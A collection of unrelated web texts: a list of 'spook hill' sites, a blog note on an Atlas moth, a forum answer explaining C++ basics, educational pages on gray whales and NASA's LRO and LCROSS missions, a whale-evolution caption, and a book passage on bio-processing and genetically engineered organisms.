Neepawa, Manitoba; Magnetic Mountain, Canada Highway, Moncton, New Brunswick - Europe: Ariccia, Rome, Italy; Electric Brae, A719, Croy Bay, Ayr, Ayeshire, Scotland; Malveira da Serra, Road N247, Lisbon, Portugal; Martina Franca, Taranto, Italy; Montagnaga, Trento, Italy; Mount Penteli, Athens, Greece - Other countries: Anti-Gravity Hill, Straws Lane Road, Wood-End, Victoria, Australia; Morgan Lewis Hill, St. Andrew, Barbados; Mount Halla, Cheju Do Island, South Korea. Readers who know of other spook hills are invited to write to us with their locations.
<urn:uuid:58c099e4-2104-4bf8-8b2d-a80fe779dd68>
3.078125
1,568
Knowledge Article
Science & Tech.
23.87318
Mostly found in Southeast Asian countries such as Indonesia, this moth is called Attacus Atlas or Sirama-rama or kupu gajah, which translates as "elephant butterfly," after its large size. The 21-centimeter pretty moth was dying when Jhony took these photographs. The presence of Attacus Atlas, according to Javanese mythology, brings fortune or tells the coming of guests. Atlas moth's wingspans can reach over 25cm, and females are apparently larger and heavier. Jhony said the moth was female. In Hong Kong, people call it as "snake's head moth," referring to apical extension of the forewing, which resembles the reptile. This resemblance, complete with eyes of a snake, is used to scare predators. Unfortunately, as Jhony held the moth, it flew to the main road and was crushed by a truck. Search using google below (Cari dengan Google--Ketik kata kunci dalam kotak)
<urn:uuid:2464cd91-aaa4-4a62-ba73-5ee6c748f7cd>
2.984375
211
Personal Blog
Science & Tech.
44.909849
#1: "#include <file.h>" does exactly the same thing as opening file.h and copy-pasting it where the "#include <file.h>" statement is located. No more, no less. #2: preprocessor directives are the things that start with a "#" hash sign. It can be used for preprocessor macros (you generally want to stay away from those), pragmas to control compiler-specific behavour, the classic #ifdef/#endif, and perhaps the most important, #include. #3: you use loops when you need a loop? #4: cin,cout are C++ iostreams, which are a lot more flexible than C-style scanf/printf (they let you write your own output formatters, and a lot more). They also have the potential to be buffer-overflow safe, which scanf/printf don't. #5: type checking is done all the time by the compiler, to ensure you don't shoot of your leg doing something stupid. C has pretty weak strong type checking, C++ has relatively strong but not over-insane type checking (contrast that to Pascal which has 'char' and 'byte' types that need typecasting >_<). You use typecasting when you need to convert one "unrelated" type to another - this doesn't happen often with decently designed C++ code, but happens a lot if you need to interface with legacy C code. Prime example is using the PlatformSDK for Windows. #6: dynamic binding/polymorphism... let's say you have a whole class of output streams you can support (to file, to console, to network, to memory...). You design an interface class for this, with all virtual functions. You can't instantiate this interface class directly, but you can instantiate the concrete derived classes (ie, FileStream, NetworkStream, ...), but all code that uses the streams can use the GenericStream class interface. Using dynamic binding, the "generic" calls are bound to the "concrete" calls of the class you're using. That explanation was probably a bit confusing, but it's pretty simple in practice. #7: a reference variable is similar to a pointer variable, but they're not equal. One thing is the syntactic sugar: with a pointer, you need to do "*ptr = value" or "ptr->field = value". With a reference, you can simply do "ref = value" or "ref.field = value". Also, references can't be reassigned, and they don't take up any additional memory - the are the variables they refer to. Think of them as aliases. #8: namespaces are wonderful basically, they were created to avoid polluting the global namespace, and having variable/function/class name clashes in large projects, or when using libraries. If two people wrote functions called SuperFormatter(), you'd usually be in trouble, but if they were put in separate namespaces, you aren't. PS: is this a homework assignment?
<urn:uuid:95ed6101-606d-4b26-b0cf-560c7f112ad2>
3.640625
645
Comment Section
Software Dev.
59.262653
Whales: Weathering Change? from Wayne Perryman, Biologist Perryman is the government's leading expert on gray whale cows and calves. He counts them each spring as they pass the California coast at Pt. Piedras Blancas on their way to Alaska. Perryman reminds us, “Most of the eastern Pacific population of gray whales feeds in the Arctic during the summer to early fall. That environment has changed significantly over the past 15 years. As the climate warms, ice gets thinner and it covers less area. This change impacts a wide range of marine mammals (seals, walrus, whales, now, we can feel comfortable saying that gray whales are feeding in different places (farther north) and on different prey than they back in the 1980s." in Feeding Areas leaving their arctic homes and migrating south to Baja Mexico, gray whales feast on tiny crustaceans that live on the is how whales put on thick layers of blubber to help sustain them during their migration south, the winter in Mexico's lagoons, and the return migration north. waters melt the sea ice, other animals move into the whales' feeding grounds. Crowded by the new competition for food, gray whales then must travel further north and feed longer to get filled up and gain blubber. Changes in Migration Timing Changes in the Arctic, say scientists, have disrupted of the whales' watchers and marine scientists note that gray whales have been delaying their southward migrations as they stay longer to eat. For example, compared to two decades ago, gray whales are reaching the later. "This isn't trivial," says Mr. Perryman. "It's a significant change." takes a long-time series of data to know how this is affecting the whale population. Climate changes slowly in the long term while weather can fluctuate widely in the sort term, so it takes time to tease out the long-term effects from the short-term Changes in Population Growth appears that growth of the gray whale population has slowed and may have stopped. Also, reproduction (indicated by number of calves migrating north) has fluctuated widely, and in general has been lower than we would expect for a growing population. How this all fits into of climate change effects is a good question. Perhaps YOU will become a scientist and help to figure it out!" This! Journal Questions more about Mr. Perryman here. Think about how his life prepared him for the job he has today. What things do YOU enjoy doing that might lead to enjoyable work in your future? would be some consequences for the gray whale food supply if arctic ice continues to melt later and to cover less area? - How might changes in the whales' migration schedule - Of the challenges you know about today, which do you think are most important for scientists to be studying? Explain. out more about gray whales and list factors that might make the species' population decrease.
<urn:uuid:08f78000-12d3-44c1-9bf0-175757472821>
3.953125
657
Knowledge Article
Science & Tech.
56.943793
LRO stands for Lunar Reconnaissance Orbiter. It is a robotic spacecraft that is orbiting, or flying around, the moon. LRO will take pictures of the moon's surface. It will help NASA learn more about the moon. LRO launched in June 2009. How Will LRO Study the Moon? LRO has six different science instruments. The orbiter will gather more information about the moon than NASA has ever known. NASA will use all this to plan and build a moon outpost someday. One goal of LRO is to find safe landing sites on the moon. LRO will look for natural resources that people living on the moon could use. It will measure the temperatures on the moon to find the best place for humans to build a lunar base. LRO will study the moon's high and low places. NASA will use that information to make 3-D maps of the moon. The maps will help NASA choose places for future spacecraft to land on the moon. A telescope on LRO will measure how much radiation is on the moon. What is learned could help NASA find ways to protect astronauts and keep them safe while on the moon. Another piece of equipment will study the moon's soil, which is called regolith. The tool will also look for water ice near the moon's surface. Water, in the form of ice, on the moon could be used for many things. Water can provide oxygen for astronauts on the moon to breathe. Water can also provide hydrogen to be used as rocket fuel. A camera on LRO will take pictures to help find landing sites. NASA hopes all these instruments will give the agency the best information ever gathered about the moon. When Did LRO Launch? LRO launched from NASA's Kennedy Space Center in June 2009. It rode on an Atlas V (5) rocket. The trip to the moon took about four days. LRO is now orbiting the moon. During each orbit, the spacecraft flies over the moon's north and south poles. When a spacecraft does this, the orbit is called a polar orbit. LRO will fly about 31 miles, or 50 kilometers, above the moon's surface. The spacecraft will orbit the moon for at least one year. Why Is NASA Studying the Moon? LRO is NASA's first step toward returning humans to the moon. NASA and scientists around the world want to study the moon. What they learn will help NASA get ready to send astronauts there and to build a lunar outpost. Astronauts can explore the moon to learn more about the history of Earth, the solar system and the universe. Astronauts could also learn things on the moon that could help life on Earth. Another reason to study the moon is to help people go to other places like Mars and beyond. By going to the moon first, NASA can test much of what will be needed for future missions. Using the moon as a practice ground will help make future missions safer. What Is LCROSS? LCROSS is a satellite that launched with LRO. LCROSS will crash into the moon and search for water. Shortly after launch, LRO and LCROSS separated. They flew to the moon on two separate paths. LCROSS is made up of two parts. When it is time for LCROSS to work, it will fly close to the moon and the two parts will separate. The first part will hit the moon near one of its poles. The impact will make a crater about one-third the size of a football field. The crater will be about as deep as the deep end of a swimming pool. The impact will also make dust and ice on the moon's surface fly out of the crater. Scientists guess that the amount of stuff that will fly out of the crater could fill 10 school buses. The second part of LCROSS will then fly through the dust and ice and study them. The second piece will also hit the moon. It will land several miles away from the first piece. LRO and LCROSS are part of NASA's Lunar Precursor Robotic Program. The program manages robotic missions that are leading the way back to the moon. More about LRO Lunar Reconnaissance Orbiter → LRO For Kids → LRO/LCROSS Animation → NASA's Lunar Precursor Robotic Program → Disney/Pixar's Wall-E Learns About Proportion → Heather R. Smith/NASA Educational Technology Services
<urn:uuid:a5dc9ced-68d4-40df-9d3e-c9a67fbd7a40>
4.15625
916
Knowledge Article
Science & Tech.
72.418384
00:00 04 February 2009 Whales evolved from land mammals sometime between 50 and 30 million years ago. New Scientist discovers what the transition species might have looked like Image 1 of 11 Whales evolved from split-hooved land mammals. Very little is known about the animals that first ventured into the water, so drawings are entirely speculative. This is one interpretation of what a Pakicetid may have looked like. They are sometimes described as the "first whales" because they were mostly land-based but the structure of part of their inner ear is very unusual and resembles only the ear structure of modern and fossil cetaceans. (Image: Carl Buell, courtesy of the Thewissen lab)
<urn:uuid:d052679f-4d16-4afe-a964-be5a66b65bc2>
3.53125
149
Truncated
Science & Tech.
38.566522
|Eco-restructuring: Implications for Sustainable Development (UNU, 1998, 417 p.)| |Part I: Restructuring resource use| |3. Ecological process engineering: The potential of bio-processing| To implement and accelerate these changes, a number of conditions must be met. Most of the points made in this section have already been made, but need emphasis. For one thing, it is vitally important to preserve biodiversity, not just for its own sake, but to preserve the genetic information embodied in living organisms. It is not just a question of finding whole organisms with valuable properties. It may be equally important to find organisms with just one valuable property that can be traced to a particular gene or group of genes. It is this possibility that raises hopes of giving food crops the ability to fix nitrogen, or to resist insects, or to tolerate saltier water or colder or hotter temperatures, or to metabolize and break down chlorinated aromatics, such as PCBs, and so on. It is also important to focus more research on bio-processing. The potential for substituting organic enzymes for inorganic catalysts is worthy of far more attention than it has ever received. The same is true of the use of microorganisms for processing low-grade metal ores or purifying industrial wastes containing heavy metals. Of course, it is important to develop and to use genetically engineered organisms (GEOs) in a sustainable way. This will require extensive and coordinated research in other sciences, including social and cultural factors. A series of open questions must be asked and answered concerning any application of GEOs. There are scientific arguments for questioning the scientific validity of the basic premises of genetic engineering. A major assumption is that each specific feature of an organism is encoded in one or a few specific, stable genes so that transferring a gene results in the transfer of a discrete feature, and nothing else. This, however, represents an extreme form of genetic reductionism. It fails to take into account the complex interactions between genes and their cellular, extra-cellular, and external environments. Changing a gene's environment can produce a cascade of further unpredictable changes that could conceivably be harmful. In the case of genetic transfer to an unrelated host it is literally impossible to predict the consequences: the stabilizing "buffering" control circuits for a gene are exposed to disruption and may be ineffective in new hosts. Owing to the high degree of complexity of any living organism, firm predictions of outcomes are nearly impossible because genomes are known to be "fluid." In other words, they are subject to a host of destabilizing processes such that the transferred gene may mutate, transpose, or recombine within the genome. It can even be transferred to a third organism or another species. In short, the evolutionary stability of organism and ecosystem may be disrupted and threatened. Like the genie in the bottle (in the tale of Aladdin's lamp), once a GEO is deliberately released, or inadvertently escapes from containment, it can never be recalled, even if adverse effects occur. GEOs may migrate, mutate, and multiply. In addition, there are serious ethical issues concerning the patenting and ownership of life-forms, including implications for cultural values and for indigenous peoples and poor countries. Editor's note: It is impractical to summarize these issues here, but it is clear that there are many legitimate concerns. Scientists and the business world tend to take the view that the general public should be excluded from the inner circles of decision-making, on grounds of inadequate technical knowledge. But this attitude is essentially undemocratic. It is also likely to backfire. It is worthwhile recalling that nuclear power technology has been discredited largely as a result of public distrust of what the so-called "experts" in government and industry were telling them. To overcome the public knowledge gap, some countries are organizing lay conferences (e.g. NEM 1996). As an exemplary case, Norway's Gene Technology Act, section 10 (Norway 1993), includes four criteria for a GEO to be acceptable: - safe to people - safe to the environment, i.e. the entire ecosphere - beneficial to the community - contributing to sustainable development. Of course, these criteria are quite general. There are endless arguments over how these criteria should be tested and measured. More specific criteria to qualify a micro-organism as "environmentally safe" have been put forward. For instance (Lelieveld et al. 1993): - non-pathogenic for plants and animals - unable to reproduce in the open environment (including by delayed reproduction of survival forms such as spores) - unable to alter equilibria irreversibly between environmental microbial populations - unable, in the open environment, to transfer genetic traits that would be noxious in other species. Editor's note: The overriding concern will be safety. It is all too easy to envision GEOs escaping into the natural environment and causing irreversible changes in natural ecosystems. The damage that can be caused by species being introduced inadvertently into environments where they have no natural enemies are well known. A few reminders will help make the point. The rabbit, no problem in Europe, became a major pest when it was introduced into Australia. The sea lamprey, introduced into the Great Lakes via the Welland Canal, has caused great harm to the freshwater fishery there. Dutch elm disease, imported to North America from Europe, has virtually wiped out the most beautiful shade trees of the eastern part of the continent. Another disease of unknown origin has totally wiped out the American chestnut trees, which once dominated the eastern forests. The Japanese beetle also caused enormous damage to agriculture before it was brought under control by pesticides. If such damage can be caused by species that already exist, some sceptics will (and do) argue that the problem could be worse with deliberate genetic manipulation in the picture. But even the foregoing criteria are ambiguous in a number of ways, because it is unclear how it is to be determined whether or not the criteria are satisfied. It is likely that, in practice, the process of testing and certification for GEOs will be no less rigorous (and possibly much more so) than the current process for drug testing in the United States. Moser takes the view that deliberate ecosystem modification (whether or not GEOs are involved) is wrong and should be prohibited on the grounds of being contra natural (owing to "invasiveness". In principle it is easy to agree, but in practice it seems unlikely that Moser's view will prevail. Apart from safety and environmental security, there are a number of other questions to be asked and answered with respect to any proposed application. These include questions concerning costs, benefits, and secondary impacts (e.g. reduced need for extractable raw materials, reduced CO2 emissions, remediation of polluted rivers, lakes, or soil, and the maintenance of biodiversity). But, again, it is impossible to go further into detail here.
<urn:uuid:a19a5f55-dbfe-47d7-a137-9d7f582a5bfb>
2.9375
1,434
Knowledge Article
Science & Tech.
27.242174